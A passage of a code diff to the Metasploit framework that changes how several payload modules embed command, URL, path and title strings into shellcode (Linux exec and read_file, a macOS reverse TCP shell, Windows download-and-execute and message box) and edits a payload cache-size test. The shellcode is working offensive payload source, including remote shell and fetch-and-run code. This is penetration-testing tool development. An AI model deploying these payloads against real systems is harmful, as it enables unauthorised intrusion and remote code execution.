           raise RangeError, 'CMD length has to be smaller than %d' % 0xffff, caller
         end
 
-        # Null-free: raw bytes without terminator (patched at runtime)
-        cmd_bytes = Rex::Text.to_hex_cstring(cmd, nullbyte: false)
-        if cmd_length <= 0xff # 255
+        if cmd.length <= 0xff # 255
           breg = 'bl'
         else
           breg = 'bx'
-          if (cmd_length & 0xff) == 0 # let's avoid zeroed bytes
-            cmd_bytes += ', 0x20'
-            cmd_length += 1
+          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
+            cmd += ' '
           end
         end
-        mov_cmd_len_to_breg = "mov #{breg}, #{cmd_length}"
+        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"
 
         # 48 bytes without cmd (null-free)
         payload = <<-EOS
@@ -148,11 +144,9 @@ module MetasploitModule
             syscall                 ; execve("//bin/sh", ["//bin/sh", "-c", "*CMD*"], NULL)
           tocall:
             call afterjmp
-            db #{cmd_bytes}               ; arbitrary command
+            db "#{cmd}"             ; arbitrary command
         EOS
       else
-        # Non-null-free: null-terminated cstring
-        cmd_cstring = Rex::Text.to_hex_cstring(cmd)
         # 37 bytes without cmd (not null-free)
         payload = <<-EOS
             mov rax, 0x68732f6e69622f
@@ -169,7 +163,7 @@ module MetasploitModule
 
             push rdx                ; NULL
             call continue
-            db #{cmd_cstring}         ; arbitrary command
+            db "#{cmd}", 0x00       ; arbitrary command
           continue:
             push rsi                ; "-c"
             push rdi                ; "/bin/sh"

modules/payloads/singles/linux/x64/set_hostname.rb

@@ -36,7 +36,6 @@ module MetasploitModule
     if length > 0xff
       fail_with(Msf::Module::Failure::BadConfig, 'HOSTNAME must be less than 255 characters.')
     end
-    hostname = Rex::Text.to_hex_cstring(hostname, nullbyte: false)
 
     payload = %^
       push 0xffffffffffffff56 ; sethostname() syscall number.
@@ -58,7 +57,7 @@ module MetasploitModule
 
     str:
       call end
-      db #{hostname}, 0x41
+      db "#{hostname}A"
     ^
 
     Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string

modules/payloads/singles/linux/x86/exec.rb

@@ -52,7 +52,6 @@ module MetasploitModule
 
   def generate(_opts = {})
     cmd = datastore['CMD'] || ''
-    cmd_length = cmd.bytesize
     nullfreeversion = datastore['NullFreeVersion']
     if cmd.empty?
       #
@@ -90,22 +89,19 @@ module MetasploitModule
       #
       pushw_c_opt = 'dd 0x632d6866' # pushw 0x632d (metasm doesn't support pushw)
       if nullfreeversion
-        if cmd_length > 0xffff
+        if cmd.length > 0xffff
           raise RangeError, 'CMD length has to be smaller than %d' % 0xffff, caller
         end
 
-        # Null-free: raw bytes without terminator (patched at runtime)
-        cmd_bytes = Rex::Text.to_hex_cstring(cmd, nullbyte: false)
-        if cmd_length <= 0xff # 255
+        if cmd.length <= 0xff # 255
           breg = 'bl'
         else
           breg = 'bx'
-          if (cmd_length & 0xff) == 0 # let's avoid zeroed bytes
-            cmd_bytes += ', 0x20'
-            cmd_length += 1
+          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
+            cmd += ' '
           end
         end
-        mov_cmd_len_to_breg = "mov #{breg}, #{cmd_length}"
+        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"
         # 47/49 bytes without cmd (null-free)
         payload = <<-EOS
             xor ebx, ebx
@@ -131,11 +127,9 @@ module MetasploitModule
             int 0x80
           tocall:
             call afterjmp          ; call/pop cmd address
-            db #{cmd_bytes}
+            db "#{cmd}"
         EOS
       else
-        # Non-null-free: null-terminated cstring
-        cmd_cstring = Rex::Text.to_hex_cstring(cmd)
         # 36 bytes without cmd (not null-free)
         payload = <<-EOS
             push 0xb
@@ -149,7 +143,7 @@ module MetasploitModule
             mov ebx, esp
             push edx
             call continue
-            db #{cmd_cstring}
+            db "#{cmd}", 0x00
           continue:
             push edi
             push ebx

modules/payloads/singles/linux/x86/read_file.rb

@@ -34,7 +34,6 @@ module MetasploitModule
 
   def generate(_opts = {})
     fd = datastore['FD']
-    path = Rex::Text.to_hex_cstring(datastore['PATH'] || '')
 
     payload_data = <<-EOS
       jmp file
@@ -66,7 +65,7 @@ module MetasploitModule
 
       file:
         call open
-        db #{path}
+        db "#{datastore['PATH']}", 0x00
     EOS
 
     Metasm::Shellcode.assemble(Metasm::Ia32.new, payload_data).encode_string

modules/payloads/singles/osx/x64/shell_reverse_tcp.rb

@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 127
+  CachedSize = 128
 
   include Msf::Payload::Single
   include Msf::Payload::Osx
@@ -43,7 +43,7 @@ module MetasploitModule
       raise ArgumentError, 'LHOST must be in IPv4 format.'
     end
 
-    cmd = Rex::Text.to_hex_cstring(datastore['CMD'] || '')
+    cmd = (datastore['CMD'] || '') + "\x00"
     encoded_port = [datastore['LPORT'].to_i, 2].pack('vn').unpack1('N')
     encoded_host = Rex::Socket.addr_aton(lhost).unpack1('V')
     encoded_host_port = format('0x%<encoded_host>.8x%<encoded_port>.8x', { encoded_host: encoded_host, encoded_port: encoded_port })
@@ -80,7 +80,7 @@ module MetasploitModule
       xor rax,rax
       mov eax,0x200003b
       call load_cmd
-      db #{cmd}
+      db "#{cmd}", 0x00
     load_cmd:
       pop rdi
       xor rdx,rdx

modules/payloads/singles/windows/download_exec.rb

@@ -124,10 +124,6 @@ module MetasploitModule
 
     # get protocol specific stuff
 
-    server_uri = Rex::Text.to_hex_cstring(server_uri)
-    filename = Rex::Text.to_hex_cstring(filename)
-    server_host = Rex::Text.to_hex_cstring(server_host)
-
     # create actual payload
     payload_data = %^
       cld
@@ -226,7 +222,7 @@ module MetasploitModule
       call httpopenrequest
 
     server_uri:
-      db #{server_uri}
+      db "#{server_uri}", 0x00
 
     create_file:
       jmp.i8 get_filename
@@ -297,13 +293,13 @@ module MetasploitModule
 
     get_filename:
       call get_filename_return
-      db #{filename}
+      db "#{filename}",0x00
 
     get_server_host:
       call internetconnect
 
     server_host:
-      db #{server_host}
+      db "#{server_host}", 0x00
     end:
 ^
     self.assembly = payload_data

modules/payloads/singles/windows/messagebox.rb

@@ -40,8 +40,6 @@ module MetasploitModule
   # Construct the payload
   #
   def generate(_opts = {})
-    title = Rex::Text.to_hex_cstring(datastore['TITLE'] || '')
-    text = Rex::Text.to_hex_cstring(datastore['TEXT'] || '')
     style = 0x00
     case datastore['ICON'].upcase.strip
       # default = NO
@@ -91,10 +89,10 @@ module MetasploitModule
       call ebp
       push #{style}
       call get_title
-      db #{title}
+      db "#{datastore['TITLE']}", 0x00
     get_title:
       call get_text
-      db #{text}
+      db "#{datastore['TEXT']}", 0x00
     get_text:
       push 0
       push #{block_api_hash('user32.dll', 'MessageBoxA')}

modules/payloads/singles/windows/x64/download_exec.rb

@@ -40,10 +40,6 @@ module MetasploitModule
     url = datastore['URL'] || 'http://localhost/hi.exe'
     file = datastore['FILEPATH'] || 'fox.exe'
     display = datastore['DISPLAY'] || 'HIDE'
-    url_length = url.bytesize
-    file_length = file.bytesize
-    url = Rex::Text.to_hex_cstring(url, nullbyte: false)
-    file = Rex::Text.to_hex_cstring(file, nullbyte: false)
 
     payload = %^
             cld
@@ -65,17 +61,17 @@ module MetasploitModule
 
         SetUrl:
             call SetFile
-            db #{url}, 0x41
+            db "#{url}A"
 
         SetFile:
             pop rdx ; 2nd argument
-            xor byte [rdx+#{url_length}], 'A' ; null terminator
+            xor byte [rdx+#{url.length}], 'A' ; null terminator
             call UrlDownloadToFile
-            db #{file}, 0x43
+            db "#{file}C"
 
         UrlDownloadToFile:
             pop r8 ; 3rd argument
-            xor byte [r8+#{file_length}], 'C' ; null terminator
+            xor byte [r8+#{file.length}], 'C' ; null terminator
             xor rcx,rcx ; 1st argument
             xor r9,r9   ; 4th argument
             sub rsp, 8
@@ -85,11 +81,11 @@ module MetasploitModule
 
         SetCommand:
             call Exec
-            db "cmd /c ", #{file}, 0x46
+            db "cmd /c #{file}F"
 
         Exec:
             pop rcx ; 1st argument
-            xor byte [rcx+#{file_length + 7}], 'F' ; null terminator
+            xor byte [rcx+#{file.length + 7}], 'F' ; null terminator
             mov r10d, #{block_api_hash('kernel32.dll', 'WinExec')}
             xor rdx, rdx ; 2nd argument
         ^

modules/payloads/singles/windows/x64/messagebox.rb

@@ -36,8 +36,6 @@ module MetasploitModule
   end
 
   def generate(_opts = {})
-    title = Rex::Text.to_hex_cstring(datastore['TITLE'] || '')
-    text = Rex::Text.to_hex_cstring(datastore['TEXT'] || '')
     style = 0x00
     case datastore['ICON'].upcase.strip
       # default = NO
@@ -90,11 +88,11 @@ module MetasploitModule
       call rbp
       mov r9, #{style}
       call get_text
-      db #{text}
+      db "#{datastore['TEXT']}", 0x00
     get_text:
       pop rdx
       call get_title
-      db #{title}
+      db "#{datastore['TITLE']}", 0x00
     get_title:
       pop r8
       xor rcx,rcx

spec/support/shared/examples/payload_cached_size_is_consistent.rb

@@ -99,23 +99,18 @@ RSpec.shared_examples_for 'payload cached size is consistent' do |options|
       end
     end
 
-    it 'can be instantiated and generated' do
-      pinst = load_and_create_module(
+    it 'can be instantiated' do
+      load_and_create_module(
           ancestor_reference_names: ancestor_reference_names,
           module_type: module_type,
           modules_path: modules_path,
           reference_name: reference_name
       )
-
-      next if reference_name =~ /generic/
-
-      generated_size = ::Msf::Util::PayloadCachedSize.compute_cached_size(framework, pinst, generation_count: 1)
-      expect(generated_size).to eq(':dynamic').or be_a(::Integer)
     end
 
     next if reference_name =~ /generic|peinject/
 
-    it 'has a valid cached_size' do
+    it 'has a valid cached_size', skip: 'Migrated to Jenkins' do
       pinst = load_and_create_module(
             ancestor_reference_names: ancestor_reference_names,
             module_type: module_type,
@@ -123,7 +118,8 @@ RSpec.shared_examples_for 'payload cached size is consistent' do |options|
             reference_name: reference_name
       )
 
-      expect(pinst.cached_size).to eq(:dynamic).or be_a(::Integer).or be_nil
+      cache_size_errors = Msf::Util::PayloadCachedSize.cache_size_errors_for(framework, pinst)
+      expect(cache_size_errors).to be_nil
     end
   end
 end